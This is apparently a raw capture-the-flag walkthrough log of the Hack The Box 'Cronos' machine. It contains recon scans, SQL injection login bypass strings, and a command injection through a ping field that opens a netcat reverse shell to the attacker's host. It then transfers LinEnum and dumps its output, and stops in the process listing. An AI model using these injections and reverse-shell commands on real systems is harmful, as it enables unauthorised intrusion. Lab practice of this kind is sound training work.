RECON
root@kali:~/htb/cronos# nmap -A -sV --script=default,vuln -p- --open 10.10.10.13
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Apache2 Ubuntu Default Page: It works
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


ENUM WEB
root@kali:~/sshenum# gobuster -e -u http://10.10.10.13 -t 80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.13/
[+] Threads      : 80
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .php,.txt
[+] Expanded     : true
=====================================================


root@kali:~/htb/cronos# dirb http://10.10.10.13

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov  7 11:35:15 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:12454)                                     
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)  

ENUM DNS
oot@kali:~/htb/cronos# dnsrecon -r 10.10.10.0/24 -n 10.10.10.13
[*] Reverse Look-up of a Range
[*] Performing Reverse Lookup from 10.10.10.0 to 10.10.10.255
[*] 	 PTR ns1.cronos.htb 10.10.10.13
[+] 1 Records Found
root@kali:~/htb/cronos# vim /etc/hosts
root@kali:~/htb/cronos# dnsrecon -d cronos.htb -n ns1.cronos.htb
[*] Performing General Enumeration of Domain: cronos.htb
[-] DNSSEC is not configured for cronos.htb
[*] 	 SOA cronos.htb 10.10.10.13
[*] 	 NS ns1.cronos.htb 10.10.10.13
[*] 	 Bind Version for 10.10.10.13 9.10.3-P4-Ubuntu
[-] Could not Resolve MX Records for cronos.htb
[*] 	 A cronos.htb 10.10.10.13
[*] Enumerating SRV Records
[-] No SRV Records Found for cronos.htb
[+] 0 Records Found

root@kali:~/htb/cronos# fierce -dns cronos.htb -dnsserver 10.10.10.13

Trying zone transfer first...

Unsuccessful in zone transfer (it was worth a shot)
Okay, trying the good old fashioned way... brute force

Checking for wildcard DNS...
Nope. Good.
Now performing 2280 test(s)...
10.10.10.13	ns1.cronos.htb
10.10.10.13	admin.cronos.htb


WEB REDIRECTION
http://admin.cronos.htb/welcome.php

TRY SQL INJECTION FOR ERRORS

username:' OR '1'='1'-- -
password:' OR '1'='1'-- -


PING 10.10.14.8 (10.10.14.8) 56(84) bytes of data.
64 bytes from 10.10.14.8: icmp_seq=1 ttl=63 time=199 ms
64 bytes from 10.10.14.8: icmp_seq=2 ttl=63 time=221 ms

--- 10.10.14.8 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 199.852/210.645/221.439/10.803 ms
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.

--- 8.8.8.8 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms

TRIGGER LOW PRIV SHELL
8.8.8.8 & rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 1234 >/tmp/f

GET LOW PRIV SHELL
root@kali:~/htb/cronos# nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.8] from cronos.htb [10.10.10.13] 39728
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/admin
$ sudo -l
sudo: no tty present and no askpass program specified
$ uname -a
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

GET USER FLAG
$ locate user.txt
/home/noulis/user.txt
$ cat /home/noulis/user.txt
#############################

PRIVESC

TRANSFER LINENUM
root@kali:~/LinEnum# cp LinEnum.sh /root/htb/cronos/

$ wget http://10.10.14.8/LinEnum.sh
--2020-11-08 01:01:18--  http://10.10.14.8/LinEnum.sh
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

     0K .......... .......... .......... .......... .....     100%  436K=0.1s

2020-11-08 01:01:18 (436 KB/s) - 'LinEnum.sh' saved [46631/46631]

root@kali:~/htb/cronos# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.13 - - [07/Nov/2020 17:56:26] "GET /LinEnum.sh HTTP/1.1" 200 -

$ ls -l
total 348
-rw-r--r-- 1 www-data www-data  46631 Nov  8 00:51 LinEnum.sh
prw-r--r-- 1 www-data www-data      0 Nov  8 01:01 f
-rwxr--r-- 1 www-data www-data 293889 Nov  8 00:42 linpeas.sh
drwx------ 3 root     root       4096 Nov  7 20:24 systemd-private-665ee6021c0042e2aa1515f4f7141b93-systemd-timesyncd.service-XXgVeK
drwx------ 2 www-data www-data   4096 Nov  8 00:52 tmux-33
drwx------ 2 root     root       4096 Nov  7 20:27 vmware-root

$ chmod 744 linpeas.sh
$  ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Sun Nov  8 01:01:37 EET 2020


### SYSTEM ##############################################
[-] Kernel information:
Linux cronos 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


[-] Kernel information (continued):
Linux version 4.4.0-72-generic (buildd@lcy01-17) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017


[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[-] Hostname:
cronos


### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             tty1                      Sun Dec 24 17:43:09 +0200 2017
noulis           pts/0    10.10.14.141     Thu Jul 27 01:39:12 +0300 2017


[-] Who else is logged on:
 01:01:37 up  4:34,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT


[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(mysql) gid=111(mysql) groups=111(mysql)
uid=108(messagebus) gid=112(messagebus) groups=112(messagebus)
uid=109(uuidd) gid=113(uuidd) groups=113(uuidd)
uid=110(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=111(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)
uid=112(bind) gid=119(bind) groups=119(bind)


[-] It looks like we have some admin users:
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(noulis) gid=1000(noulis) groups=1000(noulis),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare)


[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
noulis:x:1000:1000:Noulis Panoulis,,,:/home/noulis:/bin/bash
bind:x:112:119::/var/cache/bind:/bin/false


[-] Super user account(s):
root


[-] Accounts that have recently used sudo:
/home/noulis/.sudo_as_admin_successful


[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x  3 root   root   4.0K Mar 22  2017 .
drwxr-xr-x 23 root   root   4.0K Apr  9  2017 ..
drwxr-xr-x  4 noulis noulis 4.0K Apr  9  2017 noulis


### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/tmp
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root  4096 Mar 22  2017 /bin
drwxr-xr-x 2 root root 12288 Apr  9  2017 /sbin
drwxr-xr-x 2 root root 20480 Apr  9  2017 /usr/bin
drwxr-xr-x 2 root root  4096 Apr  9  2017 /usr/local/bin
drwxr-xr-x 2 root root  4096 Feb 15  2017 /usr/local/sbin
drwxr-xr-x 2 root root 12288 Apr  9  2017 /usr/sbin


[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen


[-] Current umask value:
0022
u=rwx,g=rx,o=rx


[-] umask value as specified in /etc/login.defs:
UMASK		022


[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  797 Apr  9  2017 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x  2 root root 4096 Mar 22  2017 .
drwxr-xr-x 95 root root 4096 Apr  9  2017 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder
-rw-r--r--  1 root root  589 Jul 16  2014 mdadm
-rw-r--r--  1 root root  670 Mar  1  2016 php
-rw-r--r--  1 root root  191 Mar 22  2017 popularity-contest

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 Apr  9  2017 .
drwxr-xr-x 95 root root 4096 Apr  9  2017 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder
-rwxr-xr-x  1 root root  539 Apr  6  2016 apache2
-rwxr-xr-x  1 root root  376 Mar 31  2016 apport
-rwxr-xr-x  1 root root 1474 Jan 17  2017 apt-compat
-rwxr-xr-x  1 root root  355 May 22  2012 bsdmainutils
-rwxr-xr-x  1 root root 1597 Nov 27  2015 dpkg
-rwxr-xr-x  1 root root  372 May  6  2015 logrotate
-rwxr-xr-x  1 root root 1293 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  539 Jul 16  2014 mdadm
-rwxr-xr-x  1 root root  435 Nov 18  2014 mlocate
-rwxr-xr-x  1 root root  249 Nov 13  2015 passwd
-rwxr-xr-x  1 root root 3449 Feb 26  2016 popularity-contest
-rwxr-xr-x  1 root root  214 May 24  2016 update-notifier-common

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 22  2017 .
drwxr-xr-x 95 root root 4096 Apr  9  2017 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Mar 22  2017 .
drwxr-xr-x 95 root root 4096 Apr  9  2017 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Apr  9  2017 .
drwxr-xr-x 95 root root 4096 Apr  9  2017 ..
-rw-r--r--  1 root root  102 Apr  6  2016 .placeholder
-rwxr-xr-x  1 root root   86 Apr 13  2016 fstrim
-rwxr-xr-x  1 root root  771 Nov  6  2015 man-db
-rwxr-xr-x  1 root root  211 May 24  2016 update-notifier-common


[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#


[-] Systemd timers:
NEXT                         LEFT          LAST                         PASSED       UNIT                         ACTIVATES
Sun 2020-11-08 05:52:51 EET  4h 51min left Sat 2020-11-07 23:55:16 EET  1h 6min ago  snapd.refresh.timer          snapd.refresh.service
Sun 2020-11-08 10:14:59 EET  9h left       Sat 2020-11-07 20:24:27 EET  4h 37min ago apt-daily.timer              apt-daily.service
Sun 2020-11-08 20:42:26 EET  19h left      Sat 2020-11-07 20:42:26 EET  4h 19min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

3 timers listed.
Enable thorough tests to see inactive timers


### NETWORKING  ##########################################
[-] Network and IP info:
ens160    Link encap:Ethernet  HWaddr 00:50:56:b9:13:8e  
          inet addr:10.10.10.13  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:138e/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:138e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4073536 errors:0 dropped:77 overruns:0 frame:0
          TX packets:2724863 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:346388619 (346.3 MB)  TX bytes:492141385 (492.1 MB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:6329 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6329 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:621921 (621.9 KB)  TX bytes:621921 (621.9 KB)


[-] ARP history:
? (10.10.10.2) at 00:50:56:b9:1a:f3 [ether] on ens160


[-] Nameserver(s):
nameserver 10.10.10.2
nameserver 8.8.8.8


[-] Default route:
default         10.10.10.2      0.0.0.0         UG    0      0        0 ens160


[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 10.10.10.13:53          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               


[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 10.10.10.13:53          0.0.0.0:*                           -               


### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.5  37984  5668 ?        Ss   Nov07   0:02 /sbin/init
root         2  0.0  0.0      0     0 ?        S    Nov07   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    Nov07   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    Nov07   0:09 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    Nov07   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    Nov07   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    Nov07   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    Nov07   0:00 [watchdog/1]
root        12  0.0  0.0      0     0 ?        S    Nov07   0:00 [migration/1]
root        13  0.0  0.0      0     0 ?        S    Nov07   0:08 [ksoftirqd/1]
root        15  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kworker/1:0H]
root        16  0.0  0.0      0     0 ?        S    Nov07   0:00 [kdevtmpfs]
root        17  0.0  0.0      0     0 ?        S<   Nov07   0:00 [netns]
root        18  0.0  0.0      0     0 ?        S<   Nov07   0:00 [perf]
root        19  0.0  0.0      0     0 ?        S    Nov07   0:00 [khungtaskd]
root        20  0.0  0.0      0     0 ?        S<   Nov07   0:00 [writeback]
root        21  0.0  0.0      0     0 ?        SN   Nov07   0:00 [ksmd]
root        22  0.0  0.0      0     0 ?        SN   Nov07   0:00 [khugepaged]
root        23  0.0  0.0      0     0 ?        S<   Nov07   0:00 [crypto]
root        24  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kintegrityd]
root        25  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        26  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kblockd]
root        27  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ata_sff]
root        28  0.0  0.0      0     0 ?        S<   Nov07   0:00 [md]
root        29  0.0  0.0      0     0 ?        S<   Nov07   0:00 [devfreq_wq]
root        32  0.0  0.0      0     0 ?        S    Nov07   0:00 [kworker/1:1]
root        34  0.0  0.0      0     0 ?        S    Nov07   0:00 [kswapd0]
root        35  0.0  0.0      0     0 ?        S<   Nov07   0:00 [vmstat]
root        36  0.0  0.0      0     0 ?        S    Nov07   0:00 [fsnotify_mark]
root        37  0.0  0.0      0     0 ?        S    Nov07   0:00 [ecryptfs-kthrea]
root        53  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kthrotld]
root        54  0.0  0.0      0     0 ?        S<   Nov07   0:00 [acpi_thermal_pm]
root        55  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        56  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        57  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        58  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        59  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        60  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        61  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        62  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root        63  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_0]
root        64  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_0]
root        65  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_1]
root        66  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_1]
root        72  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ipv6_addrconf]
root        85  0.0  0.0      0     0 ?        S<   Nov07   0:00 [deferwq]
root        86  0.0  0.0      0     0 ?        S<   Nov07   0:00 [charger_manager]
root       124  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       125  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       126  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       127  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       128  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       129  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       130  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       131  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       132  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_2]
root       133  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_2]
root       134  0.0  0.0      0     0 ?        S<   Nov07   0:00 [vmw_pvscsi_wq_2]
root       135  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_3]
root       136  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_3]
root       137  0.0  0.0      0     0 ?        S<   Nov07   0:00 [bioset]
root       139  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_4]
root       140  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_4]
root       142  0.0  0.0      0     0 ?        S<   Nov07   0:00 [kpsmoused]
root       143  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_5]
root       146  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_5]
root       149  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_6]
root       150  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_6]
root       155  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_7]
root       157  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_7]
root       158  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_8]
root       167  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_8]
root       171  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_9]
root       172  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_9]
root       177  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_10]
root       180  0.0  0.0      0     0 ?        S<   Nov07   0:00 [ttm_swap]
root       184  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_10]
root       185  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_11]
root       191  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_11]
root       193  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_12]
root       196  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_12]
root       198  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_13]
root       199  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_13]
root       200  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_14]
root       202  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_14]
root       203  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_15]
root       206  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_15]
root       208  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_16]
root       209  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_16]
root       210  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_17]
root       211  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_17]
root       212  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_18]
root       213  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_18]
root       215  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_19]
root       216  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_19]
root       217  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_20]
root       218  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_20]
root       219  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_21]
root       220  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_21]
root       221  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_22]
root       222  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_22]
root       223  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_23]
root       224  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_23]
root       225  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_24]
root       226  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_24]
root       227  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_25]
root       228  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_25]
root       229  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_26]
root       230  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_26]
root       231  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_27]
root       232  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_27]
root       233  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_28]
root       234  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_28]
root       235  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_29]
root       236  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_29]
root       237  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_30]
root       238  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_30]
root       239  0.0  0.0      0     0 ?        S    Nov07   0:00 [scsi_eh_31]
root       240  0.0  0.0      0     0 ?        S<   Nov07   0:00 [scsi_tmf_31]
